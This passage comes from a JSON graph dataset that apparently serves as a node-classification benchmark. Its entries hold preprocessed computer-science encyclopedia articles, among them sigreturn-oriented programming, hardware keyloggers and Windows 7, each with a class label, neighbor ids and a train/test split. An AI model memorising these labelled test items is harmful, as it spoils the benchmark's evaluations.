fixed issues related year 2000 problem supported eide addressing schemes include logical block addressing lba ontrack disk manager ezdrive extended cylinder-head-sector echs",
    "neighbors": [
      6150,
      11283,
      9757,
      2083,
      7204,
      11301,
      7207,
      6697,
      1581,
      7234,
      582,
      3142,
      1098,
      6231,
      8798,
      10338,
      8296,
      5225,
      8299,
      7796,
      6265,
      8315,
      636,
      639,
      8834,
      2179,
      651,
      6797,
      10896,
      2193,
      2196,
      7847,
      3250,
      9910,
      10957,
      3793,
      214,
      3289,
      4316,
      9448,
      4331,
      10989,
      3822,
      5358,
      1776,
      5363,
      5380,
      8976,
      3857,
      6441,
      7983,
      3890,
      7986,
      9525,
      6462,
      321,
      2383,
      11605,
      2391,
      11103,
      7523,
      2919,
      8576,
      3463,
      8080,
      7057,
      3477,
      4505,
      4515,
      3496,
      7615,
      7106,
      4051,
      9173,
      5078,
      5600,
      4074,
      5103,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 642,
    "label": 4,
    "text": "Sigreturn-oriented_programming:sigreturn-oriented programming sigreturn-oriented programming srop computer security exploit technique allows attacker execute code presence security measures non-executable memory code signing presented first time 35th security privacy ieee conference 2014 best student paper award technique employs basic assumptions behind return-oriented programming rop technique attacker controlling call stack example stack buffer overflow able influence control flow program simple instruction sequences called gadgets attack works pushing forged sigcontext structure call stack overwriting original return address location gadget allows attacker call sigreturn system call often single gadget needed successfully put attack effect gadget may reside fixed location making attack simple effective setup generally simpler portable one needed plain return-oriented programming technique sigreturn-oriented programming considered weird machine since allows code execution outside original specification program sigreturn-oriented programming srop technique similar return-oriented programming rop since employs code reuse execute code outside scope original control flow sense adversary needs able carry stack smashing attack usually stack buffer overflow overwrite return address contained inside call stack mechanisms data execution prevention employed wo n't possible attacker place shellcode stack cause machine execute overwriting return address protections place machine wo n't execute code present memory areas marked writable non-executable therefore attacker need reuse code already present memory programs contain functions allow attacker directly carry desired action e.g. obtain access shell necessary instructions often scattered around memory return-oriented programming requires sequences instructions called gadgets end codice_1 instruction way attacker write sequence addresses gadgets stack soon codice_1 instruction one gadget executed control flow proceed next gadget list attack made possible signals handled posix-like systems whenever signal delivered kernel needs context switch installed signal handler kernel saves current execution context frame stack structure pushed onto stack architecture-specific variant sigcontext structure holds various data comprising contents registers moment context switch execution signal handler completed codice_3 system call called calling sigreturn syscall means able easily set contents registers using single gadget easily found systems several factors characterize srop exploit distinguish classical return-oriented programming exploit first rop dependent available gadgets different distinct binaries thus making chains gadget non-portable address space layout randomization aslr makes hard use gadgets without information leakage get exact positions memory although turing-complete rop compilers exist usually non-trivial create rop chain srop exploits usually portable across different binaries minimal effort allow easily setting contents registers could non-trivial unfeasible rop exploits needed gadgets present moreover srop requires minimal number gadgets allows constructing effective shellcodes chaining system calls gadgets always present memory cases always fixed locations example kind gadget needed srop exploits always found vdso memory area x86-linux systems __kernel_sigreturn proc near pop eax mov eax 77h int 80h linux sys_sigreturn nop lea esi esi+0 __kernel_sigreturn endp linux kernel versions aslr disabled settings limits stack size unlimited effectively bypassing aslr allowing easy access gadget present vdso linux kernels prior version 3.3 also possible find suitable gadget inside vsyscall page mechanism accelerate access certain system calls often used legacy programs resides always fixed location possible use gadgets write contents stack frames thereby constructing self-modifying program using technique possible devise simple virtual machine used compilation target turing-complete language example approach found bosman paper demonstrates construction interpreter language similar brainfuck programming language language provides program counter codice_4 memory pointer codice_5 temporary register used 8-bit addition codice_6 means also complex backdoors obfuscated attacks devised number techniques exists mitigate srop attacks relying address space layout randomization canaries cookies shadow stacks address space layout randomization makes harder use suitable gadgets making locations unpredictable mitigation srop called signal cookies proposed consists way verifying sigcontext structure tampered means random cookie xored address stack location stored way sigreturn syscall needs verify cookie existence expected location effectively mitigating srop minimal impact performances linux kernel versions greater 3.3 vsyscall interface emulated attempt directly execute gadgets page result exception grsecurity set patches linux kernel harden improve system security includes so-called return-address protection rap help protect code reuse attacks starting 2016 intel developing control-flow enforcement technology cet help mitigate prevent stack-hopping exploits cet works implementing shadow stack ram contain return addresses protected cpu memory management unit",
    "neighbors": [
      1474,
      5432,
      5636,
      6180,
      1094,
      4582,
      7717,
      107,
      1103,
      5040,
      3473,
      4562,
      10933,
      823,
      5176,
      1820,
      7325,
      2367
    ],
    "mask": "Test"
  },
  {
    "node_id": 643,
    "label": 3,
    "text": "Namco_System_357:namco system 357 namco system 357 arcade system board based sony playstation 3 released 2007 board tekken 6 unlike predecessor see widespread adoption manufacturers 2011 namco released upgraded version arcade board system 369 also known system 359 use tekken tag tournament 2 system 369 specifications slim model retail ps3 consoles feature smaller chassis less heat",
    "neighbors": [
      9472,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      9126,
      6311,
      9512,
      684,
      306,
      1587,
      7218,
      6072,
      8120,
      1985,
      1091,
      9543,
      10056,
      6909,
      6732,
      10316,
      3025,
      6738,
      342,
      6873,
      1115,
      859,
      4060,
      3677,
      607,
      9445,
      359,
      8937,
      10985,
      4587,
      3824,
      8316,
      5746,
      6004,
      2293,
      7028,
      1784,
      7801,
      3323,
      6268,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 644,
    "label": 3,
    "text": "ARM_Cortex-A7:arm cortex-a7 arm cortex-a7 mpcore 32-bit microprocessor core licensed arm holdings implementing armv7-a architecture announced 2011 two target applications firstly smaller simpler power-efficient successor cortex-a8 use big.little architecture combining one a7 cores one cortex-a15 cores heterogeneous system fully feature-compatible a15 key features cortex-a7 core several system-on-chips soc implemented cortex-a7 core including",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      630,
      10361,
      6268,
      638,
      7300,
      11396,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      2838,
      5417,
      810,
      2862,
      7988,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      6009,
      8058,
      392,
      398,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 645,
    "label": 4,
    "text": "Autopsy_(software):autopsy software autopsy computer software makes simpler deploy many open source programs plugins used sleuth kit graphical user interface displays results forensic search underlying volume making easier investigators flag pertinent sections data tool largely maintained basis technology corp. assistance programmers community company sells support services training using product tool designed principles mind core browser extended adding modules help scan files called ingesting browse results called viewing summarize results called reporting collection open-source modules allow customization autopsy analyzes major file systems ntfs fat exfat hfs+ ext2/ext3/ext4 yaffs2 hashing files unpacking standard archives zip jar etc extracting exif values putting keywords index file types like standard email formats contact files also parsed cataloged users search indexed files recent activity create report html pdf summarizing important recent activity time short users may activate triage features use rules analyze important files first autopsy save partial image files vhd format investigators working multiple machines file systems build central repository data allowing flag phone numbers email addresses file pertinent data might found multiple places sql lite postgresql data base stores information investigators find occurrences names domains phone numbers usb registry entries version 2 autopsy written perl runs major platforms including linux unix macos windows relies upon sleuth kit analyze disk version 2 released gnu gpl 2.0 autopsy 3.0 written java using netbeans platform runs windows time released apache license 2.0 autopsy depends number libraries various licenses works sql lite postgresql data bases store information indices searching keywords built lucene solr",
    "neighbors": [
      6338,
      5284,
      5677,
      2231,
      2494
    ],
    "mask": "Train"
  },
  {
    "node_id": 646,
    "label": 5,
    "text": "PCM30:pcm30 pulse code modulation pcm technology patented developed france 1938 could used suitable technology available world war ii came arrival digital systems 1960s improving performance communications networks became real possibility however technology completely adopted mid-1970s due large amount analog systems already place high cost digital systems semiconductors expensive pcm ’ initial goal converting analog voice telephone channel digital one based sampling theorem pcm30 describes application pulse-code modulation pcm 30 telephony analog signals binary coded digital signal stream term used today mostly synonym encoding 30 channels signalling rate 64-kbit/s rate also used first stage european pdh technique pcm30 also known e1 originally described device communications technology converted 30 analog telephone signals digital bit stream 2048 kbit/s ... beginning 1960s proliferation analog telephone lines based copper wires together lack space new installations led transmission experts look real application pcm digitalization techniques tdm multiplexing first digital communications system set bell labs 1962 consisted 24 digital channels running known t1 1965 permitted tdm multiplexing 24 digital telephone channels 64 kbit/s 1.544-mbit/s signal format called t1 t1 signal synchronization bit added 24 tdm time slots way aggregate transmission rate europe developed tdm multiplexing scheme little later 1968 although different capacity 32 digital channels 64 kbit/s resulting signal transmitted 2.048 mbit/s format called e1 standardized itu-t adopted worldwide except u.s. canada japan e1 signal aggregate transmission rate obtained following equation 32 × 8 ⁄ 125μs 2.048mbit/s pcm30-base system analog switching technology europe served digital transmission telephone traffic 30 coders phone channel 8-bit digital word byte implement 30 bytes together frame id word channel identifier bytewise successively sent see multiplexer thus large 32-byte frame receiving direction 30 channels using de-multiplexer converted back 30 analogue signals time slot 0 used frame id word word detection used sent alternately time slot 16 channel identifier speech channels voice channel assigned 4 bits one 16 over-under frequency 500 hz length 16 ⋅ 32 ⋅ 8 4096 bits analog input signals initially passed low-pass filter signals multiplexer cyclically sampled frequency 8 khz pam signal injected signals a-curve hörgerecht quantized analogue digital a/d converter 8-bit binary word coded since 8000 samples second 8 bits made bit stream 64 kbit/s sum 32 channels 30 channels 2 telephone management channels bit rate 2048 kbit/s transmission still suitable binary signal conducted dc transmission requires freedom constant synchronous information binary bit stream therefore intermediate stage ami code hdb3 code umcodiert entire bit stream 32 fernsprechkanälen hdb3 encoded 2.048 mbit/s distant opposite body distances 3.5 km regenerators so-called line equipment bridges since 2005 almanya pcm30 lines hdb3 base provided instead 2b1q encoding used baud rate vs constant transmission rate vue half allows signal lower frequency band relocate turn positive effect attenuation signal range number channels time slots 32 number telephone channels 30 frame duration 125 microseconds channel length 3.9 microseconds bits per channel 8 bit bit duration 488 ns bitrate 2048 kbit 2.048 mbit bit rate per channel 64 kbit/s clock frequency 8 khz",
    "neighbors": [
      7108,
      1967
    ],
    "mask": "Test"
  },
  {
    "node_id": 647,
    "label": 4,
    "text": "Hardware_keylogger:hardware keylogger hardware keyloggers used keystroke logging method capturing recording computer users keystrokes including sensitive passwords implemented via bios-level firmware alternatively via device plugged inline computer keyboard computer log keyboard activity internal memory hardware keyloggers advantage software keyloggers begin logging moment computer turned therefore able intercept passwords bios disk encryption software hardware keylogger devices following generally recorded data retrieved typing special password computer text editor hardware keylogger plugged keyboard computer detects password typed presents computer typed data produce menu beyond text menu keyloggers offer high-speed download speed retrieval stored data via usb mass-storage enumeration usb serial download adapter typically memory capacity hardware keylogger may range kilobytes several gigabytes keystroke recorded typically consuming byte memory denial monitoring physical access sensitive computers e.g closed-circuit video surveillance access control effective means preventing hardware keylogger installation visual inspection easiest way detecting hardware keyloggers also techniques used hardware keyloggers market detect via software cases computer case hidden view e.g public access kiosks case locked box monitor keyboard mouse exposed view user possibility run software checks user might thwart keylogger typing part password using mouse move text editor window typing garbage text mousing back password window typing next part password etc keylogger record unintelligible mix garbage password text see also keystroke logging countermeasures main risk associated keylogger use physical access needed twice initially install keylogger secondly retrieve thus victim discovers keylogger set sting operation catch person act retrieving could include camera surveillance review access card swipe records determine gained physical access area time period keylogger removed",
    "neighbors": [
      1515,
      3532,
      2801,
      7794,
      4435,
      3572,
      8978,
      1279
    ],
    "mask": "Validation"
  },
  {
    "node_id": 648,
    "label": 7,
    "text": "Aditi_Technologies:aditi technologies aditi technologies american company headquartered bellevue washington united states largest center bangalore india aditi acquired symphony teleca april 2014 9 april 2015 harman international industries incorporated acquired symphony teleca corporation 12 november 2016 samsung entered definitive agreement acquire harman international pradeep singh founded aditi technologies 1994 nine years management positions microsoft including general manager windows 95 mobile services group aditi began microsoft service shop providing support services microsoft customers around globe 1999 talisma customer relationship management division aditi spun 1999 founding talisma driven concept supporting customers various modes communication using internet pradeep singh spent next 10 years talisma building company 2008 campus management acquired talisma brand talisma corporation pvt ltd. bangalore higher education business unit based bellevue washington 2003 pradeep singh came back aditi shifted focus company outsourced product development space area aditi spent first 12 years exclusively servicing microsoft 2004 aditi partnered pi corporation developing software targeted linux environment since 2006 involved product development software testing based microsoft software platforms october 2007 pradeep rathinam appointed president chief executive officer aditi technologies august 2010 aditi technologies partnered quest software migrate upgrade customers sharepoint 2010 sharepoint online 2011 aditi forayed cloud services space acquisition seattle based cloud computing start-up cumulux acquisition aditi invested 5 million azure acceleration lab azure-based rapid application development offering strengthen cloud computing capabilities may 2013 aditi expanded cloud capabilities acquisition get cloud ready thus entering aws market 10 april 2014 aditi announced acquired symphony teleca undisclosed amount following acquisition sanjay dhawan took ceo pradeep rathinam appointed president aditi becoming independent business unit symphony teleca aditi employs nearly 1600 people globally",
    "neighbors": [
      4194
    ],
    "mask": "Validation"
  },
  {
    "node_id": 649,
    "label": 5,
    "text": "Neighbor_Discovery_Protocol:neighbor discovery protocol neighbor discovery protocol ndp nd protocol internet protocol suite used internet protocol version 6 ipv6 operates link layer internet model rfc 1122 responsible gathering various information required internet communication including configuration local connections domain name servers gateways used communicate distant systems protocol defines five different icmpv6 packet types perform functions ipv6 similar address resolution protocol arp internet control message protocol icmp router discovery router redirect protocols ipv4 however provides many improvements ipv4 counterparts rfc 4861 section 3.1 example includes neighbor unreachability detection nud thus improving robustness packet delivery presence failing routers links mobile nodes inverse neighbor discovery ind protocol extension rfc 3122 allows nodes determine advertise ipv6 address corresponding given link-layer address similar reverse arp ipv4 secure neighbor discovery protocol send security extension ndp uses cryptographically generated addresses cga resource public key infrastructure rpki provide alternative mechanism securing ndp cryptographic method independent ipsec neighbor discovery proxy nd proxy rfc 4389 provides service similar ipv4 proxy arp allows bridging multiple network segments within single subnet prefix bridging done link layer ndp defines five icmpv6 packet types purpose router solicitation router advertisement neighbor solicitation neighbor advertisement network redirects messages used provide following functionality iana maintains list current ndp options published",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      6724,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      2185,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      7411,
      3322,
      9987,
      3847,
      10005,
      5402,
      4891,
      5405,
      8482,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      841,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      5486,
      367,
      5490,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 650,
    "label": 1,
    "text": "Naval_Vessel_Register:naval vessel register naval vessel register nvr official inventory ships service craft custody titled united states navy contains information ships service craft make official inventory navy time vessel authorized life cycle disposal also includes ships removed register often termed stricken struck disposed sale transfer another government means ships service craft disposed prior 1987 currently included gradually added along updates nvr traces origin back 1880s evolved several previous publications 1911 bureau construction repair published ships data us naval vessels subsequently became ships data book 1952 bureau ships bureau ordnance vessel register first published 1942 retitled naval vessel register combined ships data book bureau ships 1959 since 1962 nvr maintained published navsea shipbuilding support office navshipso naval sea systems command referred congress statutes nvr maintained directed u.s. navy regulations article 0406 september 14 1990 vessels listed nvr classification hull number assigned ships service craft authorized built president united states chief naval operations requests instatement reinstatement vessels approved secretary navy listed ship service craft remains nvr throughout life navy asset afterwards final disposition recorded many vessels struck nvr transferred navy inactive fleet united states maritime administration marad become part national defense reserve fleet continue limited operation ready reserve fleet nvr updated weekly 2010s available electronic form online 6,500 separate record transactions processed annually supported official documentation nvr includes current list ships service craft hand construction converted loaned/leased loaned assigned military sealift command ship class fleet assignment name age home port planning yard custodian hull machinery characteristics builder key construction dates battle forces local defense miscellaneous support forces status conditions data elements provided march 2014 navy started counting self-deployable support ships fleet minesweepers surveillance craft tugs part battle fleet order reach count 272 october 2016",
    "neighbors": [
      5126
    ],
    "mask": "Validation"
  },
  {
    "node_id": 651,
    "label": 2,
    "text": "Features_new_to_Windows_7:features new windows 7 new features included windows 7 advancements touch speech handwriting recognition support virtual hard disks support additional file formats improved performance multi-core processors improved boot performance kernel improvements windows 7 retains windows aero graphical user interface visual style introduced predecessor windows vista many areas seen enhancements unlike windows vista window borders taskbar turn opaque window maximized windows aero active instead remain translucent support themes extended windows 7 addition providing options customize colors window chrome aspects interface including desktop background icons mouse cursors sound schemes operating system also includes native desktop slideshow feature new theme pack extension introduced codice_1 essentially collection cabinet files consist theme resources including background images color preferences desktop icons mouse cursors sound schemes new theme extension simplifies sharing themes also display desktop wallpapers via rss feeds provided windows rss platform microsoft provides additional themes free website default theme windows 7 consists single desktop wallpaper named harmony default desktop icons mouse cursors sound scheme introduced windows vista however none desktop backgrounds included windows vista present windows 7 new themes include architecture characters landscapes nature scenes additional country-specific theme determined based defined locale operating system installed although theme user home country displayed within user interface files country-specific themes included operating system themes included windows 7—excluding default theme—include six wallpaper images number new sound schemes associated included theme also introduced afternoon calligraphy characters cityscape delta festival garden heritage landscape quirky raga savana sonata themes may introduce custom sounds used others themes well windows 7 introduces desktop slideshow feature periodically changes desktop wallpaper based user-defined interval change accompanied smooth fade transition duration customized via windows registry desktop slideshow feature supports local images images obtained via rss windows vista microsoft introduced gadgets display information image slideshows rss feeds user desktop gadgets could optionally displayed sidebar docked side screen windows 7 sidebar removed gadgets still placed desktop gadgets brought foreground top active applications pressing several new features gadgets introduced including new desktop context menu options access gadgets hide active gadgets high dpi support feature automatically rearrange gadget based position gadgets additional new features include cached gadget content optimizations touch-based devices gadget windows media center gadgets closely integrated windows explorer gadgets continue operate single codice_2 process unlike windows vista gadgets could operate multiple codice_2 processes active gadgets also hidden via new desktop menu option microsoft stated option result power-saving benefits original equipment manufacturers enterprises windows 7 natively supports ability customize wallpaper displayed user login settings change wallpaper available via windows registry users also customize wallpaper options customize appearance interface lighting shadows also available windows explorer windows 7 supports file libraries aggregate content various locations – including shared folders networked systems shared folder indexed host system – present unified view libraries hide actual location file stored searching library automatically federates query remote systems addition searching local system files remote systems also searched unlike search folders libraries backed physical location allows files saved libraries files transparently saved backing physical folder default save location library may configured user default view layout library libraries generally stored libraries special folder allows displayed navigation pane default new user account windows 7 contains four libraries different file types documents music pictures videos configured include user profile folders respective file types well computer corresponding public folders public folder also contains hidden recorded tv library appears windows explorer sidepane tv set media center first time addition aggregating multiple storage locations libraries enable arrangement views search filter suggestions arrangement views allow pivot view library contents based metadata example selecting month view pictures library display photos stacks stack represents month photos based date taken music library artist view display stacks albums artists collection browsing artist stack display relevant albums search filter suggestions new feature windows 7 explorer search box user clicks search box menu shows showing recent searches well suggested advanced query syntax filters user type one selected typed manually menu update show possible values filter property list based current location parts query already typed example selecting tags filter typing tags search box display list possible tag values return search results arrangement views search filter suggestions database-backed features require locations library indexed windows search service local disk locations must indexed local indexer windows explorer automatically add locations indexing scope included library remote locations indexed indexer another windows 7 machine windows machine running windows search 4 windows vista windows home server another device implements ms-wsp remote query protocol windows explorer also supports federating search external data sources custom databases web services exposed web described via opensearch definition federated location description called search connector provided codice_4 file installed data source becomes queryable directly windows explorer windows explorer features previews thumbnails work results federated search well windows explorer received numerous minor enhancements improve overall functionality explorer search box address bar resized folders desktop user profile folders hidden navigation pane reduce clutter new content view added shows thumbnails metadata together new button toggle preview pane added toolbar button create new folder moved organize menu onto toolbar list view provides space items windows vista finally storage space consumption bars present hard disks windows vista shown removable storage devices areas shell also received similar fine-tunings progress bars overlay icons may appear application button taskbar better alert user status application work progress file types property handlers ifilters installed re-indexed default previously adding submenus shell context menus customizing context menu behavior certain folder possible installing form plug-in known shell extensions windows 7 however computer-savvy users editing windows registry and/or desktop.ini files additionally new shell api introduced designed simplify writing context menu shell extensions software developers windows 7 includes native support burning iso files functionality available user selects burn disc image option within context menu iso file support disc image verification also included previous versions windows users required install-third party software burn iso images start orb fade-in highlight effect user hovers mouse cursor start menu right column aero glass color windows vista always black windows 7 start menu retains two-column layout predecessors several functional changes start search field introduced windows vista extended support searching keywords control panel items example clicking start button typing wireless show control panel options related configuring connecting wireless network adding bluetooth devices troubleshooting group policy settings windows explorer provide ability administrators active directory domain expert user add five internet web sites five additional search connectors search results view start menu links appear bottom pane allow search executed selected web site search connector microsoft suggests network administrators could use feature enable searching corporate intranets internal sharepoint server windows taskbar seen significant revision since introduction windows 95 combines previous quick launch functionality open application window icons taskbar rendered aero glass element whose color changed via personalization control panel 10 pixels taller windows vista accommodate touch screen input new larger default icon size although smaller taskbar size available well maintain proportion newer high resolution monitor modes running applications denoted border frame around icon within border color effect dependent predominant rgb value icon follows mouse cursor also indicates opened status application glass taskbar translucent windows vista taskbar buttons show icons default application titles unless set 'not combine 'combine taskbar full case icons shown application running programs running pinned taskbar rearranged items notification area also rearranged quick launch toolbar removed default configuration may easily added windows 7 taskbar application-oriented window-oriented therefore n't show window titles shown application icon clicked hovered applications pinned taskbar allowing user instant access applications commonly use ways pin applications taskbar icons dragged dropped onto taskbar application ’ icon right-clicked pin taskbar thumbnail previews introduced windows vista expanded preview windows opened application small-sized thumbnail view also interact user close window opened clicking x corresponding thumbnail preview name window also shown thumbnail preview peek window obtained hovering thumbnail preview peeking brings window thumbnail preview mouse cursor hovers turns windows desktop transparent also works tabs internet explorer individual tabs may peeked thumbnail previews thumbnail previews integrate thumbnail toolbars control application thumbnail previews example windows media player opened mouse cursor hovering application icon thumbnail preview allow user ability play stop play next/previous track without switch windows media player window jump lists menu options available right-clicking taskbar icon holding left mouse button sliding towards center desktop icon application jump list corresponding features microsoft word displaying recently opened documents windows media player recent tracks playlists internet explorer recent browsing history options opening new tabs starting inprivate browsing windows live messenger common tasks instant messaging signing changing online status 10 menu items may appear list partially customizable user progress bar taskbar tasks allows users know progress task without switching pending window task progress used windows explorer internet explorer third-party software notification area redesigned standard volume network power action center status icons present application icons shown unless user chosen shown new notification area icons control panel added replaces customize notification icons dialog box taskbar start menu properties window first introduced windows xp addition able configure whether application icons shown ability hide application notification balloons added user view notifications later time triangle left visible notification icons displays hidden notification icons unlike windows vista windows xp hidden icons displayed window taskbar instead taskbar icons dragged window notification area previous versions windows taskbar ended notification area right-hand side windows 7 however introduces show desktop button far right side taskbar initiate aero peek feature makes open windows translucent hovered mouse cursor clicking button shows desktop clicking brings windows focus new button replaces show desktop shortcut located quick launch toolbar previous versions windows touch-based devices aero peek initiated pressing holding show desktop button touching button shows desktop button also increases width accommodate pressed finger windows dragged top screen maximize dragged away restore dragging window left right screen makes take half screen allowing user tile two windows next also resizing window bottom screen top extend window full height retain width features disabled via ease access center users wish windows automatically resize aero shake allows users clear clutter screen shaking dragging back forth window choice mouse windows minimize window user shook stays active screen window shaken restored similar desktop preview use many open windows desktop feature minimize windows except one shake click hold title bar window need open shake mouse window shake maximize others minimized restore windows shake mouse whilst holding title bar open window variety new keyboard shortcuts introduced global keyboard shortcuts taskbar user interface font management overhauled windows 7 windows vista collection installed fonts displayed windows explorer window fonts originate font family appear icons represented stacks display font previews within interface windows 7 also introduces option hide installed fonts certain fonts automatically removed view based user regional settings option manually hide installed fonts also available hidden fonts remain installed enumerated application asks list available fonts thus reducing amount fonts scroll within interface also reducing memory usage windows 7 includes 40 new fonts including new gabriola font dialog box fonts windows 7 also updated display font previews within interface allows users preview fonts selecting previous versions windows displayed name font cleartype text tuner previously available microsoft powertoy earlier windows versions integrated updated windows 7 microsoft would later backport windows 8 emoji features windows 7 two major new user interface components device management windows 7 devices printers device stage integrated windows explorer together provide simplified view devices connected computer capabilities support devices printers new control panel interface directly accessible start menu unlike device manager control panel applet still present icons shown devices printers screen limited components system non-expert user recognize plug-in devices example external monitor connected system displayed device internal monitor laptop device-specific features available context menu device external monitor context menu example provides link display settings control panel new control panel applet also replaces printers window prior versions windows common printer operations setting default printer installing removing printers configuring properties paper size done control panel windows 7 server 2008 r2 introduce print driver isolation improves reliability print spooler running printer drivers separate process spooler service third party print driver fails isolated impact drivers print spooler service device stage provides centralized location externally connected multi-function device present functionality user device portable music player connected system device appears icon task bar well windows explorer windows 7 ships high-resolution images number popular devices capable connecting internet download images devices n't recognize opening icon presents window displays actions relevant device screenshots technology presented microsoft suggest mobile phone could offer options two-way synchronization configuring ring-tones copying pictures videos managing device windows media player using windows explorer navigate device device status information free memory battery life also shown actual per-device functionality defined via xml files downloaded device first connected computer provided manufacturer installation disc hilton locke worked tablet pc team microsoft reported december 11 2007 windows 7 new touch features devices supporting multi-touch overview demonstration multi-touch capabilities including virtual piano program mapping directions program touch-aware version microsoft paint given things digital conference may 27 2008 video multi-touch capabilities made available web later day windows 7 introduces native support sensors including accelerometer sensors ambient light sensors location-based sensors operating system also provides unified driver model sensor devices notable use technology windows 7 operating system adaptive display brightness feature automatically adjusts brightness compatible computer display based environmental light conditions factors gadgets developed windows 7 also display location-based information applications certain sensor capabilities developed without requisite hardware data acquired sensors considered personally identifiable information sensors disabled default windows 7 account windows 7 requires administrative permissions enable sensor sensors also require user consent share location data unlike previous versions windows windows 7 able report laptop battery need replacement operating system works design capabilities present modern laptop batteries report information powercfg command enables customization hibernation file size default windows 7 automatically sets size hibernation file 75 computer total physical memory operating system also compresses contents memory hibernate process minimize possibility contents exceeds default size hibernation file windows 7 introduces new /energy parameter powercfg command generates html report computer energy efficiency displays information related devices settings windows 7 individually suspend usb hubs supports selective suspend in-box usb class drivers direct3d 11 direct2d directwrite dxgi 1.1 warp several components currently available windows vista sp2 windows server 2008 sp2 installing platform update windows vista first introduced windows vista desktop window manager dwm windows 7 updated use version 10.1 direct3d api performance improved significantly desktop window manager still requires least direct3d 9-capable video card supported new device type introduced direct3d 11 runtime video driver conforming windows display driver model v1.1 dxgi kernel windows 7 provides 2d hardware acceleration apis gdi direct2d directwrite though gdi+ updated use functionality allows dwm use significantly lower amounts system memory grow regardless many windows opened like windows vista systems equipped wddm 1.0 video card operate fashion windows vista using software-only rendering desktop window manager windows 7 also adds support systems using multiple heterogeneous graphics cards different vendors support color depths 30 48 bits included along wide color gamut scrgb hdmi 1.3 converted output xvycc video modes supported windows 7 16-bit srgb 24-bit srgb 30-bit srgb 30-bit extended color gamut srgb 48-bit scrgb user windows 7 server 2008 r2 individual dpi settings rather machine single setting previous versions windows dpi settings changed logging without needing restart time several technologies incorporated subsequent versions windows improve performance operating system traditional hard disk drives hdd rotating platters since solid state drives ssd differ mechanical hdds key areas moving parts write amplification limited number erase cycles allowed reliable operation beneficial disable certain optimizations add others specifically ssds windows 7 incorporates many engineering changes reduce frequency writes flushes benefit ssds particular since write operation wears flash memory windows 7 also makes use trim command supported ssd implemented early devices optimizes erase cycles performed reducing need erase blocks write increasing write performance several tools techniques implemented past reduce impact rotational latency traditional hdds notably disk defragmentation superfetch readyboost application launch prefetching involve reorganizing rewriting data platters since ssds moving platters reorganization advantages may instead shorten life solid state memory therefore tools default disabled ssds windows 7 except early generation ssds might still benefit finally partitions made windows 7 ’ partition-creating tools created ssd ’ alignment needs mind avoiding unwanted systematic write amplification enterprise ultimate editions windows 7 incorporate support virtual hard disk vhd file format vhd files mounted drives created booted way wim files furthermore installed version windows 7 booted run vhd drive even non-virtual hardware thereby providing new way multi boot windows features hibernation bitlocker available booting vhd default computer disk partitioned two partitions one limited size booting bitlocker running windows recovery environment second operating system user files windows 7 also seen improvements safely remove hardware menu including ability eject one camera card time single hub retain ports future use without reboot labels removable media also listed rather drive letter windows explorer default shows memory card reader ports computer contain card bitlocker brings encryption support removable disks usb drives devices protected passphrase recovery key automatically unlocked computer according data gathered microsoft customer experience improvement program ceip 35 vista sp1 installations boot 30 seconds less lengthy boot times remainder machines mainly due services programs loaded required system first started microsoft mike fortin distinguished engineer windows team noted august 2008 microsoft set aside team work solely issue team aims significantly increase number systems experience good boot times focused hard increasing parallelism driver initialization also microsoft aims dramatically reduce number system services along demands processors storage memory windows media center windows 7 retained much design feel predecessor variety user interface shortcuts browsing capabilities playback h.264 video locally media center extender including xbox 360 supported notable enhancements windows 7 media center include new mini guide new scrub bar option color code guide show type internet content tightly integrated regular tv via guide windows 7 versions support four tuners type qam atsc cablecard ntsc etc. browsing media library items n't album art shown range foreground background color combinations instead using white text blue background left right remote control buttons held browse library quickly two-letter prefix current album name prominently shown visual aid picture library includes new slideshow capabilities individual pictures rated also browsing media library new column appears top named shared allows users access shared media libraries media center pcs directly within media center television support windows media center tv pack released microsoft 2008 incorporated windows media center includes support cablecard north american atsc clear qam tuners well creating lists favorite stations gadget windows media center also included windows 7 includes avi wav aac/adts file media sinks read respective formats mpeg-4 file source read mp4 m4a m4v mp4v mov 3gp container formats mpeg-4 file sink output mp4 format windows 7 also includes media source read mpeg transport stream/bdav mpeg-2 transport stream m2ts mts m2t avchd files transcoding encoding support exposed built-in windows application codecs included media foundation transforms mfts addition windows media audio windows media video encoders decoders asf file sink file source introduced windows vista windows 7 includes h.264 encoder baseline profile level 3 main profile support aac low complexity aac-lc profile encoder playback various media formats windows 7 also introduces h.264 decoder baseline main high profiles support level 5.1 aac-lc he-aac v1 sbr multichannel he-aac v2 ps stereo decoders mpeg-4 part 2 simple profile advanced simple profile decoders includes decoding popular codec implementations divx xvid nero digital well mjpeg dv mft decoders avi windows media player 12 uses built-in media foundation codecs play formats default windows 7 also updates directshow filters 